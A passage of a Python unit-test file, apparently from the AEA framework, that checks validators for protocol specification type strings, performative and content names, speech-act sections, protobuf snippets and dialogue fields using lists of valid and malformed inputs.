invalid_content_type_1 = "pt:tuple[pt:bytes]" assert _is_valid_list(invalid_content_type_1) is False invalid_content_type_2 = "list[pt:bool]" assert _is_valid_list(invalid_content_type_2) is False invalid_content_type_3 = "pt: list[pt:float]" assert _is_valid_list(invalid_content_type_3) is False invalid_content_type_4 = "pt:list[string]" assert _is_valid_list(invalid_content_type_4) is False invalid_content_type_5 = "pt:list[bool]" assert _is_valid_list(invalid_content_type_5) is False invalid_content_type_6 = "pt:list[bytes" assert _is_valid_list(invalid_content_type_6) is False invalid_content_type_7 = "pt:list[pt:float, pt:bool]" assert _is_valid_list(invalid_content_type_7) is False invalid_content_type_8 = "pt:list[]" assert _is_valid_list(invalid_content_type_8) is False invalid_content_type_9 = "pt:list[pt:set[pt:bool, pt:set[pt:str]]" assert _is_valid_list(invalid_content_type_9) is False invalid_content_type_10 = "pt:list" assert _is_valid_list(invalid_content_type_10) is False def test_is_valid_dict(self): """Test for the '_is_valid_dict' method.""" valid_content_type_1 = "pt:dict[pt:bytes, pt:int]" assert _is_valid_dict(valid_content_type_1) is True valid_content_type_2 = "pt:dict[pt:int, pt:int]" assert _is_valid_dict(valid_content_type_2) is True valid_content_type_3 = "pt:dict[pt:float, pt:str]" assert _is_valid_dict(valid_content_type_3) is True valid_content_type_4 = "pt:dict[pt:bool, pt:str]" assert _is_valid_dict(valid_content_type_4) is True valid_content_type_5 = "pt:dict[pt:bool,pt:float]" assert _is_valid_dict(valid_content_type_5) is True valid_content_type_6 = " pt:dict[ pt:bytes , pt:int ] " assert _is_valid_dict(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:map[pt:bool, pt:str]" assert _is_valid_dict(invalid_content_type_1) is False invalid_content_type_2 = "dict[pt:int, pt:float]" assert _is_valid_dict(invalid_content_type_2) is False invalid_content_type_3 = "pt: dict[pt:bytes, pt:bool]" assert _is_valid_dict(invalid_content_type_3) is False invalid_content_type_4 = "pt:dict[float, pt:str]" assert _is_valid_dict(invalid_content_type_4) is False invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" assert _is_valid_dict(invalid_content_type_5) is False invalid_content_type_6 = "pt:dict(pt:boolean, pt:int" assert _is_valid_dict(invalid_content_type_6) is False invalid_content_type_7 = "pt:dict[pt:boolean]" assert _is_valid_dict(invalid_content_type_7) is False invalid_content_type_8 = "pt:dict[]" assert _is_valid_dict(invalid_content_type_8) is False invalid_content_type_9 = "pt:dict[pt:str, pt:float, pt:int, pt:bytes]" assert _is_valid_dict(invalid_content_type_9) is False invalid_content_type_10 = "pt:dict[pt:set[pt:bool, pt:str]" assert _is_valid_dict(invalid_content_type_10) is False invalid_content_type_11 = "pt:dict" assert _is_valid_dict(invalid_content_type_11) is False def test_is_valid_union(self): """Test for the '_is_valid_union' method.""" valid_content_type_1 = ( "pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]" ) assert _is_valid_union(valid_content_type_1) is True valid_content_type_2 = "pt:union[pt:bytes, pt:set[pt:int]]" assert _is_valid_union(valid_content_type_2) is True valid_content_type_3 = "pt:union[pt:float, pt:bool]" assert _is_valid_union(valid_content_type_3) is True valid_content_type_4 = "pt:union[pt:set[pt:int], pt:set[pt:float]]" assert _is_valid_union(valid_content_type_4) is True valid_content_type_5 = "pt:union[pt:bool,pt:bytes]" assert _is_valid_union(valid_content_type_5) is True valid_content_type_6 = " pt:union[ pt:bytes , pt:set[ pt:int ] ] " assert _is_valid_union(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:onion[pt:bool, pt:str]" assert _is_valid_union(invalid_content_type_1) is False invalid_content_type_2 = "union[pt:int, pt:float]" assert _is_valid_union(invalid_content_type_2) is False invalid_content_type_3 = "pt: union[pt:set[pt:int], pt:bool]" assert _is_valid_union(invalid_content_type_3) is False invalid_content_type_4 = "pt:union[float, pt:str" assert _is_valid_union(invalid_content_type_4) is False invalid_content_type_5 = "pt:union[pt:int, pt:dict[pt:str, pt:bool]" assert _is_valid_union(invalid_content_type_5) is False invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" assert _is_valid_union(invalid_content_type_6) is False invalid_content_type_7 = "pt:union[pt:boolean]" assert _is_valid_union(invalid_content_type_7) is False invalid_content_type_8 = "pt:union[]" assert _is_valid_union(invalid_content_type_8) is False invalid_content_type_9 = "pt:union[pt:str, pt:int, pt:str]" assert _is_valid_union(invalid_content_type_9) is False invalid_content_type_10 = "pt:union[pt:set[pt:integer], pt:float]" assert _is_valid_union(invalid_content_type_10) is False invalid_content_type_11 = ( "pt:union[pt:dict[pt:set[pt:bool]], pt:list[pt:set[pt:str]]]" ) assert _is_valid_union(invalid_content_type_11) is False invalid_content_type_12 = "pt:union" assert _is_valid_union(invalid_content_type_12) is False def test_is_valid_optional(self): """Test for the '_is_valid_optional' method.""" valid_content_type_1 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) assert _is_valid_optional(valid_content_type_1) is True valid_content_type_2 = "pt:optional[pt:union[pt:bytes, pt:set[pt:int]]]" assert _is_valid_optional(valid_content_type_2) is True valid_content_type_3 = "pt:optional[pt:bytes]" assert _is_valid_optional(valid_content_type_3) is True valid_content_type_4 = "pt:optional[pt:int]" assert _is_valid_optional(valid_content_type_4) is True valid_content_type_5 = "pt:optional[pt:float]" assert _is_valid_optional(valid_content_type_5) is True valid_content_type_6 = "pt:optional[pt:bool]" assert _is_valid_optional(valid_content_type_6) is True valid_content_type_7 = "pt:optional[pt:str]" assert _is_valid_optional(valid_content_type_7) is True valid_content_type_8 = "pt:optional[pt:set[pt:bytes]]" assert _is_valid_optional(valid_content_type_8) is True valid_content_type_9 = "pt:optional[pt:list[pt:int]]" assert _is_valid_optional(valid_content_type_9) is True valid_content_type_10 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) assert _is_valid_optional(valid_content_type_10) is True ################################################### invalid_content_type_1 = "pt:optinal[pt:bytes]" assert _is_valid_optional(invalid_content_type_1) is False invalid_content_type_2 = "optional[pt:int]" assert _is_valid_optional(invalid_content_type_2) is False invalid_content_type_3 = "pt: optional[pt:float]" assert _is_valid_optional(invalid_content_type_3) is False invalid_content_type_4 = "pt:optional[bool]" assert _is_valid_optional(invalid_content_type_4) is False invalid_content_type_5 = "pt:optional[pt:str" assert _is_valid_optional(invalid_content_type_5) is False invalid_content_type_6 = "pt:optional{pt:set[pt:int]]" assert _is_valid_optional(invalid_content_type_6) is False invalid_content_type_7 = "pt:optional[pt:string]" assert _is_valid_optional(invalid_content_type_7) is False invalid_content_type_8 = "pt:optional[]" assert _is_valid_optional(invalid_content_type_8) is False invalid_content_type_9 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" assert _is_valid_optional(invalid_content_type_9) is False invalid_content_type_10 = "pt:optional[pt:list[pt:boolean]]" assert _is_valid_optional(invalid_content_type_10) is False invalid_content_type_11 = "pt:optional[pt:dict[pt:set[pt:int]]]" assert _is_valid_optional(invalid_content_type_11) is False invalid_content_type_12 = "pt:optional" assert _is_valid_optional(invalid_content_type_12) is False def test_is_valid_content_type_format(self): """Test for the '_is_valid_content_type_format' method.""" valid_content_type_1 = "ct:DataModel" assert _is_valid_content_type_format(valid_content_type_1) is True valid_content_type_2 = "pt:int" assert _is_valid_content_type_format(valid_content_type_2) is True valid_content_type_3 = "pt:set[pt:float]" assert _is_valid_content_type_format(valid_content_type_3) is True valid_content_type_4 = "pt:list[pt:bool]" assert _is_valid_content_type_format(valid_content_type_4) is True valid_content_type_5 = "pt:dict[pt:bool,pt:float]" assert _is_valid_content_type_format(valid_content_type_5) is True valid_content_type_6 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) assert _is_valid_content_type_format(valid_content_type_6) is True valid_content_type_7 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) assert _is_valid_content_type_format(valid_content_type_7) is True ################################################### invalid_content_type_1 = "ct:data" assert _is_valid_content_type_format(invalid_content_type_1) is False invalid_content_type_2 = "bool" assert _is_valid_content_type_format(invalid_content_type_2) is False invalid_content_type_3 = "pt: set[pt:int]" assert _is_valid_content_type_format(invalid_content_type_3) is False invalid_content_type_4 = "pt:list[string]" assert _is_valid_content_type_format(invalid_content_type_4) is False invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" assert _is_valid_content_type_format(invalid_content_type_5) is False invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" assert _is_valid_content_type_format(invalid_content_type_6) is False invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" assert _is_valid_content_type_format(invalid_content_type_7) is False def test_validate_performatives(self): """Test for the '_validate_performatives' method.""" valid_content_type_1 = "offer" valid_result_1, valid_msg_1 = _validate_performatives(valid_content_type_1) assert valid_result_1 is True assert valid_msg_1 == "Performative '{}' is valid.".format(valid_content_type_1) valid_content_type_2 = "send_HTTP_message" valid_result_2, valid_msg_2 = _validate_performatives(valid_content_type_2) assert valid_result_2 is True assert valid_msg_2 == "Performative '{}' is valid.".format(valid_content_type_2) valid_content_type_3 = "request_2PL" valid_result_3, valid_msg_3 = _validate_performatives(valid_content_type_3) assert valid_result_3 is True assert valid_msg_3 == "Performative '{}' is valid.".format(valid_content_type_3) valid_content_type_4 = "argue" valid_result_4, valid_msg_4 = _validate_performatives(valid_content_type_4) assert valid_result_4 is True assert valid_msg_4 == "Performative '{}' is valid.".format(valid_content_type_4) ################################################### invalid_content_type_1 = "_offer" invalid_result_1, invalid_msg_1 = _validate_performatives( invalid_content_type_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_1, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_2 = "request_" invalid_result_2, invalid_msg_2 = _validate_performatives( invalid_content_type_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_2, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_3 = "_query_" invalid_result_3, invalid_msg_3 = _validate_performatives( invalid_content_type_3 ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_3, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_4 = "$end" invalid_result_4, invalid_msg_4 = _validate_performatives( invalid_content_type_4 ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_4, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_5 = "create()" invalid_result_5, invalid_msg_5 = _validate_performatives( invalid_content_type_5 ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_5, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_6 = "_body" invalid_result_6, invalid_msg_6 = _validate_performatives( invalid_content_type_6 ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid name for performative '{}'. This name is reserved.".format( invalid_content_type_6, ) ) invalid_content_type_7 = "message_id" invalid_result_7, invalid_msg_7 = _validate_performatives( invalid_content_type_7 ) assert invalid_result_7 is False assert ( invalid_msg_6 == "Invalid name for performative '{}'. This name is reserved.".format( invalid_content_type_6, ) ) def test_validate_content_name(self): """Test for the '_validate_content_name' method.""" performative = "some_performative" valid_content_type_1 = "content" valid_result_1, valid_msg_1 = _validate_content_name( valid_content_type_1, performative ) assert valid_result_1 is True assert valid_msg_1 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_1, performative ) valid_content_type_2 = "HTTP_msg_name" valid_result_2, valid_msg_2 = _validate_content_name( valid_content_type_2, performative ) assert valid_result_2 is True assert valid_msg_2 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_2, performative ) valid_content_type_3 = "number_of_3PLs" valid_result_3, valid_msg_3 = _validate_content_name( valid_content_type_3, performative ) assert valid_result_3 is True assert valid_msg_3 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_3, performative ) valid_content_type_4 = "model" valid_result_4, valid_msg_4 = _validate_content_name( valid_content_type_4, performative ) assert valid_result_4 is True assert valid_msg_4 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_4, performative ) ################################################### invalid_content_type_1 = "_content" invalid_result_1, invalid_msg_1 = _validate_content_name( invalid_content_type_1, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_1, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_2 = "content_" invalid_result_2, invalid_msg_2 = _validate_content_name( invalid_content_type_2, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_2, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_3 = "_content_" invalid_result_3, invalid_msg_3 = _validate_content_name( invalid_content_type_3, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_3, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_4 = "con^en^" invalid_result_4, invalid_msg_4 = _validate_content_name( invalid_content_type_4, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_4, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_5 = "some_content()" invalid_result_5, invalid_msg_5 = _validate_content_name( invalid_content_type_5, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_5, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_6 = "target" invalid_result_6, invalid_msg_6 = _validate_content_name( invalid_content_type_6, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( invalid_content_type_6, performative, ) ) invalid_content_type_7 = "performative" invalid_result_7, invalid_msg_7 = _validate_content_name( invalid_content_type_7, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( invalid_content_type_7, performative, ) ) def test_validate_content_type(self): """Test for the '_validate_content_type' method.""" performative = "some_performative" content_name = "some_content_name" valid_content_type_1 = "ct:DataModel" valid_result_1, valid_msg_1 = _validate_content_type( valid_content_type_1, content_name, performative ) assert valid_result_1 is True assert ( valid_msg_1 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_2 = "pt:int" valid_result_2, valid_msg_2 = _validate_content_type( valid_content_type_2, content_name, performative ) assert valid_result_2 is True assert ( valid_msg_2 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_3 = "pt:set[pt:float]" valid_result_3, valid_msg_3 = _validate_content_type( valid_content_type_3, content_name, performative ) assert valid_result_3 is True assert ( valid_msg_3 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_4 = "pt:list[pt:bool]" valid_result_4, valid_msg_4 = _validate_content_type( valid_content_type_4, content_name, performative ) assert valid_result_4 is True assert ( valid_msg_4 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_5 = "pt:dict[pt:bool,pt:float]" valid_result_5, valid_msg_5 = _validate_content_type( valid_content_type_5, content_name, performative ) assert valid_result_5 is True assert ( valid_msg_5 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_6 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) valid_result_6, valid_msg_6 = _validate_content_type( valid_content_type_6, content_name, performative ) assert valid_result_6 is True assert ( valid_msg_6 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_7 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) valid_result_7, valid_msg_7 = _validate_content_type( valid_content_type_7, content_name, performative ) assert valid_result_7 is True assert ( valid_msg_7 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) ################################################### invalid_content_type_1 = "ct:data" invalid_result_1, invalid_msg_1 = _validate_content_type( invalid_content_type_1, content_name, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_2 = "bool" invalid_result_2, invalid_msg_2 = _validate_content_type( invalid_content_type_2, content_name, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_3 = "pt: set[pt:int]" invalid_result_3, invalid_msg_3 = _validate_content_type( invalid_content_type_3, content_name, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_4 = "pt:list[string]" invalid_result_4, invalid_msg_4 = _validate_content_type( invalid_content_type_4, content_name, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" invalid_result_5, invalid_msg_5 = _validate_content_type( invalid_content_type_5, content_name, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" invalid_result_6, invalid_msg_6 = _validate_content_type( invalid_content_type_6, content_name, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" invalid_result_7, invalid_msg_7 = _validate_content_type( invalid_content_type_7, content_name, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_speech_acts_section(self, mocked_spec): """Test for the '_validate_speech_acts_section' method.""" valid_speech_act_content_config_1 = SpeechActContentConfig( content_1="ct:CustomType", content_2="pt:int" ) valid_speech_act_content_config_2 = SpeechActContentConfig( content_3="ct:DataModel" ) valid_speech_act_content_config_3 = SpeechActContentConfig() speech_act_1 = CRUDCollection() speech_act_1.create("perm_1", valid_speech_act_content_config_1) speech_act_1.create("perm_2", valid_speech_act_content_config_2) speech_act_1.create("perm_3", valid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_1 ( valid_result_1, valid_msg_1, valid_all_per_1, valid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Speech-acts are valid." assert valid_all_per_1 == {"perm_1", "perm_2", "perm_3"} assert valid_all_content_1 == {"ct:CustomType", "ct:DataModel"} ################################################### speech_act_3 = CRUDCollection() invalid_perm = "_query_" speech_act_3.create(invalid_perm, valid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_3 ( invalid_result_1, invalid_msg_1, invalid_all_per_1, invalid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_perm, PERFORMATIVE_REGEX_PATTERN ) ) assert invalid_all_per_1 is None assert invalid_all_content_1 is None invalid_speech_act_content_config_1 = SpeechActContentConfig(target="pt:int") speech_act_4 = CRUDCollection() valid_perm = "perm_1" speech_act_4.create(valid_perm, invalid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_4 ( invalid_result_2, invalid_msg_2, invalid_all_per_2, invalid_all_content_2, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( "target", valid_perm, ) ) assert invalid_all_per_2 is None assert invalid_all_content_2 is None invalid_speech_act_content_config_2 = SpeechActContentConfig( content_name_1="pt: set[pt:int]" ) speech_act_5 = CRUDCollection() speech_act_5.create(valid_perm, invalid_speech_act_content_config_2) mocked_spec.speech_acts = speech_act_5 ( invalid_result_3, invalid_msg_3, invalid_all_per_3, invalid_all_content_3, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content 'content_name_1' of performative '{}'. See documentation for the correct format of specification types.".format( valid_perm, ) ) assert invalid_all_per_3 is None assert invalid_all_content_3 is None speech_act_6 = CRUDCollection() mocked_spec.speech_acts = speech_act_6 ( invalid_result_4, invalid_msg_4, invalid_all_per_4, invalid_all_content_4, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_4 is False assert invalid_msg_4 == "Speech-acts cannot be empty!" assert invalid_all_per_4 is None assert invalid_all_content_4 is None invalid_speech_act_content_config_3 = SpeechActContentConfig(content_name_1=123) speech_act_7 = CRUDCollection() speech_act_7.create(valid_perm, invalid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_7 ( invalid_result_5, invalid_msg_5, invalid_all_per_5, invalid_all_content_5, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_5 is False assert ( invalid_msg_5 == f"Invalid type for '{"content_name_1"}'. Expected str. Found {type(123)}." ) assert invalid_all_per_5 is None assert invalid_all_content_5 is None invalid_speech_act_content_config_4 = SpeechActContentConfig( content_name_1="pt:int" ) invalid_speech_act_content_config_5 = SpeechActContentConfig( content_name_1="pt:float" ) speech_act_8 = CRUDCollection() speech_act_8.create("perm_1", invalid_speech_act_content_config_4) speech_act_8.create("perm_2", invalid_speech_act_content_config_5) mocked_spec.speech_acts = speech_act_8 ( invalid_result_6, invalid_msg_6, invalid_all_per_6, invalid_all_content_6, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_6 is False assert ( invalid_msg_6 == "Content 'content_name_1' with type 'pt:float' under performative 'perm_2' is already defined under performative 'perm_1' with a different type ('pt:int')." ) assert invalid_all_per_6 is None assert invalid_all_content_6 is None @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_protocol_buffer_schema_code_snippets(self, mocked_spec): """Test for the '_validate_protocol_buffer_schema_code_snippets' method.""" valid_protobuf_snippet_1 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;\nrepeated int32 set_field = 6;\nrepeated string list_field = 7;\nmap<int32, bool> dict_field = 8;\n" } valid_all_content_1 = {"ct:DataModel"} mocked_spec.protobuf_snippets = valid_protobuf_snippet_1 valid_result_1, valid_msg_1, = _validate_protocol_buffer_schema_code_snippets( mocked_spec, valid_all_content_1 ) assert valid_result_1 is True assert valid_msg_1 == "Protobuf code snippet section is valid." valid_protobuf_snippet_2 = {} valid_all_content_2 = set() mocked_spec.protobuf_snippets = valid_protobuf_snippet_2 valid_result_2, valid_msg_2, = _validate_protocol_buffer_schema_code_snippets( mocked_spec, valid_all_content_2 ) assert valid_result_2 is True assert valid_msg_2 == "Protobuf code snippet section is valid." ################################################### invalid_protobuf_snippet_1 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;", "ct:Query": "bytes bytes_field = 1;", } invalid_all_content_1 = {"ct:DataModel"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_1 ( invalid_result_1, invalid_msg_1, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Extra protobuf code snippet provided. Type 'ct:Query' is not used anywhere in your protocol definition." ) invalid_protobuf_snippet_2 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;", } invalid_all_content_2 = {"ct:DataModel", "ct:Frame"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_2 ( invalid_result_2, invalid_msg_2, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "No protobuf code snippet is provided for the following custom types: {}".format( {"ct:Frame"}, ) ) def test_validate_field_existence(self): """Test for the '_validate_field_existence' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": [ "performative_mt", "performative_o", "performative_empty_contents", ], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } ( valid_result_1, valid_msg_1, ) = _validate_field_existence(valid_dialogue_config_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section has all the required fields." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1.pop("initiation") ( invalid_result_1, invalid_msg_1, ) = _validate_field_existence(invalid_dialogue_config_1) assert 